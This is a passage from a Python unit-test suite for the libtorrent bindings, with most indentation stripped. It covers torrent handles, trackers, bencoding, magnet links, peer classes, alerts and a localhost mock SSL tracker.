atp.verified_pieces = []
atp.piece_priorities = []
atp.url_seeds = []
def test_unique(self):
metrics = lt.session_stats_metrics()
self.assertTrue(len(metrics) > 40)
idx = set()
for m in metrics:
self.assertTrue(m.value_index not in idx)
idx.add(m.value_index)
def test_find_idx(self):
self.assertEqual(lt.find_metric_idx("peer.error_peers"), 0)
class test_torrent_handle(unittest.TestCase):
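# note: setup() (lowercase) is a plain helper that each test calls explicitly; it is not unittest's automatic setUp() hook.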
def setup(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
self.h = self.ses.add_torrent({
'ti': self.ti, 'save_path': os.getcwd(),
'flags': lt.torrent_flags.default_flags})
def test_add_torrent_error(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
with self.assertRaises(RuntimeError):
self.ses.add_torrent({'ti': self.ti, 'save_path': os.getcwd(), 'info_hash': b'abababababababababab'})
def test_move_storage(self):
self.setup()
self.h.move_storage(u'test-dir')
self.h.move_storage(b'test-dir2')
self.h.move_storage('test-dir3')
self.h.move_storage(u'test-dir', flags=lt.move_flags_t.dont_replace)
self.h.move_storage(u'test-dir', flags=2)
self.h.move_storage(b'test-dir2', flags=2)
self.h.move_storage('test-dir3', flags=2)
def test_torrent_handle(self):
self.setup()
self.assertEqual(self.h.get_file_priorities(), [4, 4])
self.assertEqual(self.h.get_piece_priorities(), [4])
self.h.prioritize_files([0, 1])
# workaround for asynchronous priority update
time.sleep(1)
self.assertEqual(self.h.get_file_priorities(), [0, 1])
self.h.prioritize_pieces([0])
self.assertEqual(self.h.get_piece_priorities(), [0])
# also test the overload that takes a list of piece->priority mappings
self.h.prioritize_pieces([(0, 1)])
self.assertEqual(self.h.get_piece_priorities(), [1])
self.h.connect_peer(('127.0.0.1', 6881))
self.h.connect_peer(('127.0.0.2', 6881), source=4)
self.h.connect_peer(('127.0.0.3', 6881), flags=2)
self.h.connect_peer(('127.0.0.4', 6881), flags=2, source=4)
torrent_files = self.h.torrent_file()
print(torrent_files.map_file(0, 0, 0).piece)
print(self.h.queue_position())
def test_torrent_handle_in_set(self):
self.setup()
torrents = set()
torrents.add(self.h)
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a set, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents.add(h)
self.assertEqual(len(torrents), 1)
def test_torrent_handle_in_dict(self):
self.setup()
torrents = {}
torrents[self.h] = 'foo'
# get another instance of a torrent_handle that represents the same
# torrent. Make sure that when we add it to a dict, it just replaces the
# existing object
t = self.ses.get_torrents()
self.assertEqual(len(t), 1)
for h in t:
torrents[h] = 'bar'
self.assertEqual(len(torrents), 1)
self.assertEqual(torrents[self.h], 'bar')
def test_replace_trackers(self):
self.setup()
trackers = []
for idx, tracker_url in enumerate(('udp://tracker1.com', 'udp://tracker2.com')):
tracker = lt.announce_entry(tracker_url)
tracker.tier = idx
tracker.fail_limit = 2
trackers.append(tracker)
self.assertEqual(tracker.url, tracker_url)
self.h.replace_trackers(trackers)
new_trackers = self.h.trackers()
self.assertEqual(new_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(new_trackers[1]['tier'], 1)
self.assertEqual(new_trackers[1]['fail_limit'], 2)
def test_pickle_trackers(self):
"""Test lt objects convertors are working and trackers can be pickled"""
self.setup()
tracker = lt.announce_entry('udp://tracker1.com')
tracker.tier = 0
tracker.fail_limit = 1
trackers = [tracker]
self.h.replace_trackers(trackers)
# wait a bit until the endpoints list gets populated
while len(self.h.trackers()[0]['endpoints']) == 0:
time.sleep(0.1)
trackers = self.h.trackers()
self.assertEqual(trackers[0]['url'], 'udp://tracker1.com')
# this is not necessarily 0, it could also be (EHOSTUNREACH) if the
# local machine doesn't support the address family
expect_value = trackers[0]['endpoints'][0]['last_error']['value']
pickled_trackers = pickle.dumps(trackers)
unpickled_trackers = pickle.loads(pickled_trackers)
self.assertEqual(unpickled_trackers[0]['url'], 'udp://tracker1.com')
self.assertEqual(unpickled_trackers[0]['endpoints'][0]['last_error']['value'], expect_value)
def test_file_status(self):
self.setup()
status = self.h.file_status()
print(status)
def test_piece_deadlines(self):
self.setup()
self.h.clear_piece_deadlines()
def test_status_last_uploaded_downloaded(self):
# we want to check at seconds precision but can't control session
# time, wait for next full second to prevent second increment
time.sleep(1 - datetime.datetime.now().microsecond / 1000000.0)
self.setup()
st = self.h.status()
for attr in dir(st):
print('%s: %s' % (attr, getattr(st, attr)))
# last upload and download times are at session start time
self.assertEqual(st.last_upload, None)
self.assertEqual(st.last_download, None)
def test_serialize_trackers(self):
"""Test to ensure the dict contains only python built-in types"""
self.setup()
self.h.add_tracker({'url': 'udp://tracker1.com'})
tr = self.h.trackers()[0]
# wait a bit until the endpoints list gets populated
while len(tr['endpoints']) == 0:
time.sleep(0.1)
tr = self.h.trackers()[0]
import json
print(json.dumps(self.h.trackers()[0]))
def test_torrent_status(self):
self.setup()
st = self.h.status()
ti = st.handle
self.assertEqual(ti.info_hash(), self.ti.info_hash())
# make sure we can compare torrent_status objects
st2 = self.h.status()
self.assertEqual(st2, st)
print(st2)
def test_read_resume_data(self):
resume_data = lt.bencode({
'file-format': 'libtorrent resume file',
'info-hash': 'abababababababababab',
'name': 'test',
'save_path': '.',
'peers': '\x01\x01\x01\x01\x00\x01\x02\x02\x02\x02\x00\x02',
'file_priority': [0, 1, 1]})
tp = lt.read_resume_data(resume_data)
self.assertEqual(tp.name, 'test')
self.assertEqual(tp.info_hash, lt.sha1_hash('abababababababababab'))
self.assertEqual(tp.file_priorities, [0, 1, 1])
self.assertEqual(tp.peers, [('1.1.1.1', 1), ('2.2.2.2', 2)])
ses = lt.session(settings)
h = ses.add_torrent(tp)
for attr in dir(tp):
print('%s: %s' % (attr, getattr(tp, attr)))
h.connect_peer(('3.3.3.3', 3))
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
def test_scrape(self):
self.setup()
# this is just to make sure this function can be called like this
# from python
self.h.scrape_tracker()
def test_unknown_torrent_parameter(self):
self.ses = lt.session(settings)
try:
self.h = self.ses.add_torrent({'unexpected-key-name': ''})
self.assertFalse('should have thrown an exception')
except KeyError as e:
print(e)
def test_torrent_parameter(self):
self.ses = lt.session(settings)
self.ti = lt.torrent_info('url_seed_multi.torrent')
self.h = self.ses.add_torrent({
'ti': self.ti,
'save_path': os.getcwd(),
'trackers': ['http://test.com/announce'],
'dht_nodes': [('1.2.3.4', 6881), ('4.3.2.1', 6881)],
'file_priorities': [1, 1],
'http_seeds': ['http://test.com/file3'],
'url_seeds': ['http://test.com/announce-url'],
'peers': [('5.6.7.8', 6881)],
'banned_peers': [('8.7.6.5', 6881)],
'renamed_files': {0: 'test.txt', 2: 'test.txt'}
})
self.st = self.h.status()
self.assertEqual(self.st.save_path, os.getcwd())
trackers = self.h.trackers()
self.assertEqual(len(trackers), 1)
self.assertEqual(trackers[0].get('url'), 'http://test.com/announce')
self.assertEqual(trackers[0].get('tier'), 0)
self.assertEqual(self.h.get_file_priorities(), [1, 1])
self.assertEqual(self.h.http_seeds(), ['http://test.com/file3'])
# url_seeds was already set, test that it did not get overwritten
self.assertEqual(self.h.url_seeds(),
['http://test.com/announce-url/', 'http://test.com/file/'])
# piece priorities weren't set explicitly, but they were updated by the
# file priorities being set
self.assertEqual(self.h.get_piece_priorities(), [1])
self.assertEqual(self.ti.merkle_tree(), [])
self.assertEqual(self.st.verified_pieces, [])
class TestAddPiece(unittest.TestCase):
def setUp(self):
self.dir = tempfile.TemporaryDirectory()
self.session = lt.session(settings)
self.ti = lt.torrent_info(dummy_data.DICT)
self.atp = lt.add_torrent_params()
self.atp.ti = self.ti
self.atp.save_path = self.dir.name
self.handle = self.session.add_torrent(self.atp)
self.wait_for(lambda: self.handle.status().state != lt.torrent_status.checking_files
and self.handle.status().state != lt.torrent_status.checking_resume_data, msg="checking")
def wait_for(self, condition, msg="condition", timeout=5):
deadline = time.time() + timeout
while not condition():
self.assertLess(time.time(), deadline, msg="%s timed out" % msg)
time.sleep(0.1)
def wait_until_torrent_finished(self):
self.wait_for(lambda: self.handle.status().progress == 1.0, msg="progress")
def file_written():
with open(os.path.join(self.dir.name.encode(), dummy_data.NAME), mode="rb") as f:
return f.read() == dummy_data.DATA
self.wait_for(file_written, msg="file write")
def test_with_str(self):
for i, data in enumerate(dummy_data.PIECES):
self.handle.add_piece(i, data.decode(), 0)
self.wait_until_torrent_finished()
def test_with_bytes(self):
for i, data in enumerate(dummy_data.PIECES):
self.handle.add_piece(i, data, 0)
self.wait_until_torrent_finished()
class test_torrent_info(unittest.TestCase):
def test_bencoded_constructor(self):
# things that can be converted to a bencoded entry, will be interpreted
# as such and encoded
info = lt.torrent_info({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})
self.assertEqual(info.num_files(), 1)
f = info.files()
self.assertEqual(f.file_path(0), 'test_torrent')
self.assertEqual(f.file_name(0), 'test_torrent')
self.assertEqual(f.file_size(0), 1234)
self.assertEqual(info.total_size(), 1234)
self.assertEqual(info.creation_date(), 0)
def test_bytearray(self):
# a bytearray object is interpreted as a bencoded buffer
info = lt.torrent_info(bytearray(lt.bencode({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})))
self.assertEqual(info.num_files(), 1)
def test_bytes(self):
# a bytes object is interpreted as a bencoded buffer
info = lt.torrent_info(bytes(lt.bencode({'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}})))
self.assertEqual(info.num_files(), 1)
def test_load_decode_depth_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'test': {'test': {'test': {'test': {'test': {}}}}}, 'info': {
'name': 'test_torrent', 'length': 1234,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_decode_depth': 1}))
def test_load_max_pieces_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'info': {
'name': 'test_torrent', 'length': 1234000,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_pieces': 1}))
def test_load_max_buffer_size_limit(self):
self.assertRaises(RuntimeError, lambda: lt.torrent_info(
{'info': {
'name': 'test_torrent', 'length': 1234000,
'piece length': 16 * 1024,
'pieces': 'aaaaaaaaaaaaaaaaaaaa'}}, {'max_buffer_size': 1}))
def test_metadata(self):
ti = lt.torrent_info('base.torrent')
self.assertTrue(len(ti.metadata()) != 0)
self.assertTrue(len(ti.hash_for_piece(0)) != 0)
def test_torrent_info_bytes_overload(self):
# bytes will never be interpreted as a file name. It's interpreted as a
# bencoded buffer
with self.assertRaises(RuntimeError):
ti = lt.torrent_info(b'base.torrent')
def test_web_seeds(self):
ti = lt.torrent_info('base.torrent')
ws = [{'url': 'http://foo/test', 'auth': '', 'type': 0},
{'url': 'http://bar/test', 'auth': '', 'type': 1}]
ti.set_web_seeds(ws)
web_seeds = ti.web_seeds()
self.assertEqual(len(ws), len(web_seeds))
for i in range(len(web_seeds)):
self.assertEqual(web_seeds[i]["url"], ws[i]["url"])
self.assertEqual(web_seeds[i]["auth"], ws[i]["auth"])
self.assertEqual(web_seeds[i]["type"], ws[i]["type"])
def test_announce_entry(self):
ae = lt.announce_entry('test')
self.assertEqual(ae.url, 'test')
self.assertEqual(ae.tier, 0)
self.assertEqual(ae.verified, False)
self.assertEqual(ae.source, 0)
def test_torrent_info_sha1_hash_overload(self):
ti = lt.torrent_info(lt.sha1_hash('a' * 20))
self.assertEqual(ti.info_hash(), lt.sha1_hash('a' * 20))
ti_copy = lt.torrent_info(ti)
self.assertEqual(ti_copy.info_hash(), lt.sha1_hash('a' * 20))
def test_url_seed(self):
ti = lt.torrent_info('base.torrent')
ti.add_tracker('foobar1')
ti.add_url_seed('foobar2')
ti.add_url_seed('foobar3', 'username:password')
ti.add_url_seed('foobar4', 'username:password', [])
seeds = ti.web_seeds()
self.assertEqual(seeds, [
{'url': 'foobar2', 'type': 0, 'auth': ''},
{'url': 'foobar3', 'type': 0, 'auth': 'username:password'},
{'url': 'foobar4', 'type': 0, 'auth': 'username:password'},
])
def test_http_seed(self):
ti = lt.torrent_info('base.torrent')
ti.add_http_seed('foobar2')
ti.add_http_seed('foobar3', 'username:password')
ti.add_http_seed('foobar4', 'username:password', [])
seeds = ti.web_seeds()
self.assertEqual(seeds, [
{'url': 'foobar2', 'type': 1, 'auth': ''},
{'url': 'foobar3', 'type': 1, 'auth': 'username:password'},
{'url': 'foobar4', 'type': 1, 'auth': 'username:password'},
])
class test_alerts(unittest.TestCase):
def test_alert(self):
ses = lt.session(settings)
ti = lt.torrent_info('base.torrent')
h = ses.add_torrent({'ti': ti, 'save_path': os.getcwd()})
st = h.status()
time.sleep(1)
ses.remove_torrent(h)
ses.wait_for_alert(1000) # milliseconds
alerts = ses.pop_alerts()
for a in alerts:
if a.what() == 'add_torrent_alert':
self.assertEqual(a.torrent_name, 'temp')
print(a.message())
for field_name in dir(a):
if field_name.startswith('__'):
continue
field = getattr(a, field_name)
if callable(field):
print(' ', field_name, ' = ', field())
else:
print(' ', field_name, ' = ', field)
print(st.next_announce)
self.assertEqual(st.name, 'temp')
print(st.errc.message())
print(st.pieces)
print(st.last_seen_complete)
print(st.completed_time)
print(st.progress)
print(st.num_pieces)
print(st.distributed_copies)
print(st.info_hash)
print(st.seeding_duration)
print(st.last_upload)
print(st.last_download)
self.assertEqual(st.save_path, os.getcwd())
def test_alert_fs(self):
ses = lt.session(settings)
s1, s2 = socket.socketpair()
ses.set_alert_fd(s2.fileno())
ses.pop_alerts()
# make sure there's an alert to wake us up
ses.post_session_stats()
read_sockets, write_sockets, error_sockets = select.select([s1], [], [])
self.assertEqual(len(read_sockets), 1)
for s in read_sockets:
s.recv(10)
def test_pop_alerts(self):
ses = lt.session(settings)
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
# this will cause an error (because of duplicate torrents) and the
# torrent_info object created here will be deleted once the alert goes out
# of scope. When that happens, the Python object's reference count is
# decremented, allowing the object to be released.
# we're trying to catch the error described in this post, with regards to
# torrent_info.
# https://mail.python.org/pipermail/cplusplus-sig/2007-June/012130.html
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
time.sleep(1)
for i in range(0, 10):
alerts = ses.pop_alerts()
for a in alerts:
print(a.message())
time.sleep(0.1)
def test_alert_notify(self):
ses = lt.session(settings)
event = threading.Event()
def callback():
event.set()
ses.set_alert_notify(callback)
ses.async_add_torrent(
{"ti": lt.torrent_info("base.torrent"), "save_path": "."})
event.wait()
class test_bencoder(unittest.TestCase):
def test_bencode(self):
encoded = lt.bencode({'a': 1, 'b': [1, 2, 3], 'c': 'foo'})
self.assertEqual(encoded, b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe')
def test_bdecode(self):
encoded = b'd1:ai1e1:bli1ei2ei3ee1:c3:fooe'
decoded = lt.bdecode(encoded)
self.assertEqual(decoded, {b'a': 1, b'b': [1, 2, 3], b'c': b'foo'})
def test_string(self):
encoded = lt.bencode('foo\u00e5\u00e4\u00f6')
self.assertEqual(encoded, b'9:foo\xc3\xa5\xc3\xa4\xc3\xb6')
def test_bytes(self):
encoded = lt.bencode(b'foo')
self.assertEqual(encoded, b'3:foo')
def test_float(self):
# TODO: this should throw a TypeError in the future
with self.assertWarns(DeprecationWarning):
encoded = lt.bencode(1.337)
self.assertEqual(encoded, b'0:')
def test_object(self):
class FooBar:
dummy = 1
# TODO: this should throw a TypeError in the future
with self.assertWarns(DeprecationWarning):
encoded = lt.bencode(FooBar())
self.assertEqual(encoded, b'0:')
def test_preformatted(self):
encoded = lt.bencode((1, 2, 3, 4, 5))
self.assertEqual(encoded, b'\x01\x02\x03\x04\x05')
class test_sha1hash(unittest.TestCase):
def test_sha1hash(self):
h = 'a0' * 20
s = lt.sha1_hash(binascii.unhexlify(h))
self.assertEqual(h, str(s))
class test_magnet_link(unittest.TestCase):
def test_parse_magnet_uri(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri(magnet)
self.assertEqual(str(p.info_hash), '178882f042c0c33426a6d81e0333ece346e68a68')
p.save_path = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
def test_parse_magnet_uri_dict(self):
ses = lt.session({})
magnet = 'magnet:?xt=urn:btih:C6EIF4CCYDBTIJVG3APAGM7M4NDONCTI'
p = lt.parse_magnet_uri_dict(magnet)
self.assertEqual(binascii.hexlify(p['info_hash']), b'178882f042c0c33426a6d81e0333ece346e68a68')
p['save_path'] = '.'
h = ses.add_torrent(p)
self.assertEqual(str(h.info_hash()), '178882f042c0c33426a6d81e0333ece346e68a68')
class test_peer_class(unittest.TestCase):
def test_peer_class_ids(self):
s = lt.session(settings)
print('global_peer_class_id:', lt.session.global_peer_class_id)
print('tcp_peer_class_id:', lt.session.tcp_peer_class_id)
print('local_peer_class_id:', lt.session.local_peer_class_id)
print('global: ', s.get_peer_class(s.global_peer_class_id))
        print('tcp: ', s.get_peer_class(s.tcp_peer_class_id))
print('local: ', s.get_peer_class(s.local_peer_class_id))
def test_peer_class(self):
s = lt.session(settings)
c = s.create_peer_class('test class')
print('new class: ', s.get_peer_class(c))
nfo = s.get_peer_class(c)
self.assertEqual(nfo['download_limit'], 0)
self.assertEqual(nfo['upload_limit'], 0)
self.assertEqual(nfo['ignore_unchoke_slots'], False)
self.assertEqual(nfo['connection_limit_factor'], 100)
self.assertEqual(nfo['download_priority'], 1)
self.assertEqual(nfo['upload_priority'], 1)
self.assertEqual(nfo['label'], 'test class')
nfo['download_limit'] = 1337
nfo['upload_limit'] = 1338
nfo['ignore_unchoke_slots'] = True
nfo['connection_limit_factor'] = 42
nfo['download_priority'] = 2
nfo['upload_priority'] = 3
s.set_peer_class(c, nfo)
nfo2 = s.get_peer_class(c)
self.assertEqual(nfo, nfo2)
def test_peer_class_filter(self):
filt = lt.peer_class_type_filter()
filt.add(lt.peer_class_type_filter.tcp_socket, lt.session.global_peer_class_id)
filt.remove(lt.peer_class_type_filter.utp_socket, lt.session.local_peer_class_id)
filt.disallow(lt.peer_class_type_filter.tcp_socket, lt.session.global_peer_class_id)
filt.allow(lt.peer_class_type_filter.utp_socket, lt.session.local_peer_class_id)
def test_peer_class_ip_filter(self):
s = lt.session(settings)
s.set_peer_class_type_filter(lt.peer_class_type_filter())
s.set_peer_class_filter(lt.ip_filter())
class test_ip_filter(unittest.TestCase):
def test_export(self):
f = lt.ip_filter()
self.assertEqual(f.access('1.1.1.1'), 0)
f.add_rule('1.1.1.1', '1.1.1.2', 1)
self.assertEqual(f.access('1.1.1.0'), 0)
self.assertEqual(f.access('1.1.1.1'), 1)
self.assertEqual(f.access('1.1.1.2'), 1)
self.assertEqual(f.access('1.1.1.3'), 0)
exp = f.export_filter()
self.assertEqual(exp, ([('0.0.0.0', '1.1.1.0'), ('1.1.1.1', '1.1.1.2'), ('1.1.1.3', '255.255.255.255')], [('::', 'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')]))
class test_session(unittest.TestCase):
def test_settings(self):
sett = { 'alert_mask': lt.alert.category_t.all_categories }
s = lt.session(sett)
sett = s.get_settings()
self.assertEqual(sett['alert_mask'] & 0x7fffffff, 0x7fffffff)
def test_add_torrent(self):
s = lt.session(settings)
s.add_torrent({'ti': lt.torrent_info('base.torrent'),
'save_path': '.',
'dht_nodes': [('1.2.3.4', 6881), ('4.3.2.1', 6881)],
'http_seeds': ['http://test.com/seed'],
'peers': [('5.6.7.8', 6881)],
'banned_peers': [('8.7.6.5', 6881)],
'file_priorities': [1, 1, 1, 2, 0]})
def test_session_status(self):
if not has_deprecated():
return
s = lt.session()
st = s.status()
print(st)
print(st.active_requests)
print(st.dht_nodes)
print(st.dht_node_cache)
print(st.dht_torrents)
print(st.dht_global_nodes)
print(st.dht_total_allocations)
def test_apply_settings(self):
s = lt.session(settings)
s.apply_settings({'num_want': 66, 'user_agent': 'test123'})
self.assertEqual(s.get_settings()['num_want'], 66)
self.assertEqual(s.get_settings()['user_agent'], 'test123')
def test_post_session_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification,
'enable_dht': False})
s.post_session_stats()
alerts = []
        # first comes the stats header log line (unless logging is disabled)
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
while len(alerts) > 0:
a = alerts.pop(0)
print(a)
if isinstance(a, lt.session_stats_header_alert):
break
self.assertTrue(isinstance(a, lt.session_stats_header_alert))
# then the actual stats values
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
print(a)
self.assertTrue(isinstance(a, lt.session_stats_alert))
self.assertTrue(isinstance(a.values, dict))
self.assertTrue(len(a.values) > 0)
def test_post_dht_stats(self):
s = lt.session({'alert_mask': lt.alert.category_t.stats_notification, 'enable_dht': False})
s.post_dht_stats()
alerts = []
        # first comes the stats header log line (unless logging is disabled)
while len(alerts) == 0:
s.wait_for_alert(1000)
alerts = s.pop_alerts()
a = alerts.pop(0)
self.assertTrue(isinstance(a, lt.dht_stats_alert))
self.assertTrue(isinstance(a.active_requests, list))
self.assertTrue(isinstance(a.routing_table, list))
def test_unknown_settings(self):
try:
lt.session({'unexpected-key-name': 42})
            self.fail('should have thrown an exception')
except KeyError as e:
print(e)
def test_fingerprint(self):
self.assertEqual(lt.generate_fingerprint('LT', 0, 1, 2, 3), '-LT0123-')
self.assertEqual(lt.generate_fingerprint('..', 10, 1, 2, 3), '-..A123-')
def test_min_memory_preset(self):
min_mem = lt.min_memory_usage()
print(min_mem)
self.assertTrue('connection_speed' in min_mem)
self.assertTrue('file_pool_size' in min_mem)
def test_seed_mode_preset(self):
seed_mode = lt.high_performance_seed()
print(seed_mode)
self.assertTrue('alert_queue_size' in seed_mode)
self.assertTrue('connection_speed' in seed_mode)
self.assertTrue('file_pool_size' in seed_mode)
def test_default_settings(self):
default = lt.default_settings()
print(default)
class test_example_client(unittest.TestCase):
def test_execute_client(self):
if os.name == 'nt':
# TODO: fix windows includes of client.py
return
my_stdin = sys.stdin
if os.name != 'nt':
master_fd, slave_fd = pty.openpty()
            # use the pty slave end as stdin so termios.tcgetattr in client.py
            # sees a tty instead of the shared test stdin
my_stdin = slave_fd
process = sub.Popen(
[sys.executable, "client.py", "url_seed_multi.torrent"],
stdin=my_stdin, stdout=sub.PIPE, stderr=sub.PIPE)
# python2 has no Popen.wait() timeout
time.sleep(5)
returncode = process.poll()
if returncode is None:
# this is an expected use-case
process.kill()
err = process.stderr.read().decode("utf-8")
        self.assertEqual('', err, 'process printed errors:\n' + err)
        # check the error code if the process ended unexpectedly
        if returncode is not None:
            # on error, dump stdout in case nothing was written to stderr
            if returncode != 0:
                print("stdout:\n" + process.stdout.read().decode("utf-8"))
            self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
                             + "stderr: empty\n"
                             + "some configurations do not report errors such as missing module members; "
                             + "try running the script manually to get the error message\n")
def test_execute_simple_client(self):
process = sub.Popen(
[sys.executable, "simple_client.py", "url_seed_multi.torrent"],
stdout=sub.PIPE, stderr=sub.PIPE)
# python2 has no Popen.wait() timeout
time.sleep(5)
returncode = process.poll()
if returncode is None:
# this is an expected use-case
process.kill()
err = process.stderr.read().decode("utf-8")
        self.assertEqual('', err, 'process printed errors:\n' + err)
        # check the error code if the process ended unexpectedly
        if returncode is not None:
            # on error, dump stdout in case nothing was written to stderr
            if returncode != 0:
                print("stdout:\n" + process.stdout.read().decode("utf-8"))
            self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
                             + "stderr: empty\n"
                             + "some configurations do not report errors such as missing module members; "
                             + "try running the script manually to get the error message\n")
def test_execute_make_torrent(self):
process = sub.Popen(
[sys.executable, "make_torrent.py", "url_seed_multi.torrent",
"http://test.com/test"], stdout=sub.PIPE, stderr=sub.PIPE)
returncode = process.wait()
# python2 has no Popen.wait() timeout
err = process.stderr.read().decode("utf-8")
        self.assertEqual('', err, 'process printed errors:\n' + err)
        # on error, dump stdout in case nothing was written to stderr
        if returncode != 0:
            print("stdout:\n" + process.stdout.read().decode("utf-8"))
        self.assertEqual(returncode, 0, "returncode: " + str(returncode) + "\n"
                         + "stderr: empty\n"
                         + "some configurations do not report errors such as missing module members; "
                         + "try running the script manually to get the error message\n")
def test_default_settings(self):
default = lt.default_settings()
self.assertNotIn('', default)
print(default)
class test_operation_t(unittest.TestCase):
def test_enum(self):
self.assertEqual(lt.operation_name(lt.operation_t.sock_accept), "sock_accept")
self.assertEqual(lt.operation_name(lt.operation_t.unknown), "unknown")
self.assertEqual(lt.operation_name(lt.operation_t.mkdir), "mkdir")
self.assertEqual(lt.operation_name(lt.operation_t.partfile_write), "partfile_write")
self.assertEqual(lt.operation_name(lt.operation_t.hostname_lookup), "hostname_lookup")
class test_error_code(unittest.TestCase):
def test_error_code(self):
a = lt.error_code()
a = lt.error_code(10, lt.libtorrent_category())
self.assertEqual(a.category().name(), 'libtorrent')
self.assertEqual(lt.libtorrent_category().name(), 'libtorrent')
self.assertEqual(lt.upnp_category().name(), 'upnp')
self.assertEqual(lt.http_category().name(), 'http')
self.assertEqual(lt.socks_category().name(), 'socks')
self.assertEqual(lt.bdecode_category().name(), 'bdecode')
self.assertEqual(lt.generic_category().name(), 'generic')
self.assertEqual(lt.system_category().name(), 'system')
class test_peer_info(unittest.TestCase):
def test_peer_info_members(self):
p = lt.peer_info()
print(p.client)
print(p.pieces)
print(p.pieces)
print(p.last_request)
print(p.last_active)
print(p.flags)
print(p.source)
print(p.pid)
print(p.downloading_piece_index)
print(p.ip)
print(p.local_endpoint)
print(p.read_state)
print(p.write_state)
class test_dht_settings(unittest.TestCase):
def test_construct(self):
ds = lt.dht_settings()
print(ds.max_peers_reply)
print(ds.search_branching)
print(ds.max_fail_count)
print(ds.max_fail_count)
print(ds.max_torrents)
print(ds.max_dht_items)
print(ds.restrict_routing_ips)
print(ds.restrict_search_ips)
print(ds.max_torrent_search_reply)
print(ds.extended_routing_table)
print(ds.aggressive_lookups)
print(ds.privacy_lookups)
print(ds.enforce_node_id)
print(ds.ignore_dark_internet)
print(ds.block_timeout)
print(ds.block_ratelimit)
print(ds.read_only)
print(ds.item_lifetime)
def get_isolated_settings():
return {
"enable_dht": False,
"enable_lsd": False,
"enable_natpmp": False,
"enable_upnp": False,
"listen_interfaces": "127.0.0.1:0",
"dht_bootstrap_nodes": "",
}
def loop_until_timeout(timeout, msg="condition"):
deadline = time.monotonic() + timeout
while time.monotonic() < deadline:
yield
raise AssertionError(f"{msg} timed out")
def unlink_all_files(path):
for dirpath, _, filenames in os.walk(path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
os.unlink(filepath)
# In test cases where libtorrent writes torrent data in a temporary directory,
# cleaning up the tempdir on Windows CI sometimes fails with a PermissionError
# having WinError 5 (Access Denied). I can't repro this WinError in any way;
# holding an open file handle results in a different WinError. Seems to be a
# race condition which only happens with very short-lived tests which write
# data. Work around by cleaning up the tempdir in a loop.
# TODO: why is this necessary?
def cleanup_with_windows_fix(tempdir, *, timeout):
# Clean up just the files, so we don't have to bother with depth-first
# traversal
for _ in loop_until_timeout(timeout, msg="PermissionError clear"):
try:
unlink_all_files(tempdir.name)
except PermissionError:
if sys.platform == "win32":
# current release of mypy doesn't know about winerror
# if exc.winerror == 5:
continue
raise
break
# This removes directories in depth-first traversal.
# It also marks the tempdir as explicitly cleaned so it doesn't trigger a
# ResourceWarning.
tempdir.cleanup()
def wait_for(session, alert_type, *, timeout, prefix=None):
# Return the first alert of type, but log all alerts.
result = None
for _ in loop_until_timeout(timeout, msg=alert_type.__name__):
for alert in session.pop_alerts():
print(f"{alert.what()}: {alert.message()}")
if result is None and isinstance(alert, alert_type):
result = alert
if result is not None:
return result
raise AssertionError("unreachable")
class LambdaRequestHandler(http.server.BaseHTTPRequestHandler):
default_request_version = "HTTP/1.1"
def __init__(self, get_data, *args, **kwargs):
self.get_data = get_data
super().__init__(*args, **kwargs)
def do_GET(self):
print(f"mock tracker request: {self.requestline}")
data = self.get_data()
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
self.wfile.write(data)
class SSLTrackerAlertTest(unittest.TestCase):
def setUp(self):
self.cert_path = os.path.realpath(os.path.join(
os.path.dirname(__file__), "..", "..", "test", "ssl", "server.pem"
))
print(f"cert_path = {self.cert_path}")
self.tracker_response = {
b"external ip": b"\x01\x02\x03\x04",
}
self.tracker = http.server.HTTPServer(
("127.0.0.1", 0),
functools.partial(
LambdaRequestHandler, lambda: lt.bencode(self.tracker_response)
),
)
self.ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.ctx.load_cert_chain(self.cert_path)
self.tracker.socket = self.ctx.wrap_socket(
self.tracker.socket, server_side=True
)
self.tracker_thread = threading.Thread(target=self.tracker.serve_forever)
self.tracker_thread.start()
# HTTPServer.server_name seems to resolve to things like
# "localhost.localdomain"
port = self.tracker.server_port
self.tracker_url = f"https://127.0.0.1:{port}/announce"
print(f"mock tracker url = {self.tracker_url}")
self.settings = get_isolated_settings()
self.settings["alert_mask"] = lt.alert_category.status
# I couldn't get validation to work on all platforms. Setting
# SSL_CERT_FILE to our self-signed cert works on linux and mac, but
# not on Windows.
